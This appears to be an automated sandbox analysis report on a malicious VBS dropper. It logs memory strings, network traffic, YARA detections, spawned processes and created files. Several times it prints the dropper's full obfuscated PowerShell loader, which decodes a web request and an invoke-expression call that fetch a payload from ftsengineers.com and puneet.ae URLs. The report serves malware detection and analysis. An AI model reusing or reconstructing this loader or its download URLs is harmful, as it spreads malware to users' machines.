            Source: powershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A9AFD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ftsengineers.com
            Source: powershell.exe, 00000006.00000002.2988349216.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A991F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000006.00000002.2970700817.00000000046E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2968789365.0000000002CBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000003.00000002.1874103061.0000021AA9260000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9AFD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ftsengineers.com/km/microcheilia.dwp
            Source: powershell.exe, 00000003.00000002.1849596951.0000021A99415000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1849596951.0000021A9A66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2970700817.0000000004835000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.puneet.ae/km/microcheilia.dwp
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownHTTPS traffic detected: 103.53.42.63:443 -> 192.168.2.4:49731 version: TLS 1.2

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi32_6640.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAAAB263_2_00007FFD9BAAAB26
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9BAAB8D23_2_00007FFD9BAAB8D2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02DFEBA06_2_02DFEBA0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02DFF4706_2_02DFF470
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_02DFE8586_2_02DFE858
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_06D506476_2_06D50647
            Source: S1a5ZF3ytp.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4484
            Source: unknownProcess created: Commandline size = 4484
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4484Jump to behavior
            Source: amsi32_6640.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 6640, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/9@2/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bethink.SalJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3992:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2316:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ak3t1omf.bzo.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1732
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6640
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S1a5ZF3ytp.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
            Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLo
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Polars229='Afkvistning158';;$Navier='kompetencegivende';;$Ndudgangen9='semipreserved';;$Straalepletten='Knaldgassen';;$Forhales=$host.Name;function Tilbageholdte($Satirisation){If ($Forhales) {$Nonanarchically=2} for ($Jurywoman=$Nonanarchically;;$Jurywoman+=3){if(!$Satirisation[$Jurywoman]){cls;break }$Halomancy+=$Satirisation[$Jurywoman];$Hiveward='Schweizerostens'}$Halomancy}function Containeriseringers($Taltes213){ .($Murage) ($Taltes213)}$Plagen=Tilbageholdte ' SNRee gt c. Uw';$Plagen+=Tilbageholdte ' ae aB.lC.ulE i EeSiN at';$Moonscape=Tilbageholdte 'B,MCoo,tz,hi Sl,al Cao /';$elegiker=Tilbageholdte ' aT TlFlsto1Fo2';$Ungeneral='Ar[T.npuEM TM .BiSDuE rFeV ITrc oEPaP.poNaISunIstS.MRiAAmNBua nGHaESdr M]Kn:So:StsC eSeCFaU yr aI utA,y RpAlrMaoU t OKoCKootaL,u=Pe$ eEB.lS eFlg OiOmK BeBir';$Moonscape+=Tilbageholdte 'Mo5Gu. u0La G( LW viKrnT d oKawCosVi O.NHeTRe i1Ae0 r.Ap0Sl;st ,eW Si .nH 6Bo4Dr; u ,ix i6 H4O,;Ke Lur RvA :Pi1L 3Fo1Va.Bu0Ab) d ,GBae cDekHao /tr2Va0Re1E.0an0 M1As0Ne1 L TiFSei MrNeeSef CoDrx o/R 1Cy3 T1.o.So0';$Retransform=Tilbageholdte ' FUT sC,eTeris-skA ag,eeRen Ct';$Automatteoriens=Tilbageholdte 'RuhSath.tSpp jsE :Qu/ e/T w Tw OwKr. vfVitGasMae n gKriS nTreSte rL.sTr. Ac RoT.mF /RekSpmG./RemLyimecNarP.oHocOvhTheDri SlReiW a L.Sid Kw.rp Q> jh lt It.opEvsFo:hy/ e/N w CwSkwfu. opAfu bn eS.e itfa.Tra eesl/HykRumGa/ vmE,iHuc CrSmoG cDrh .e HiPalK iWaaC,. rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . .DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
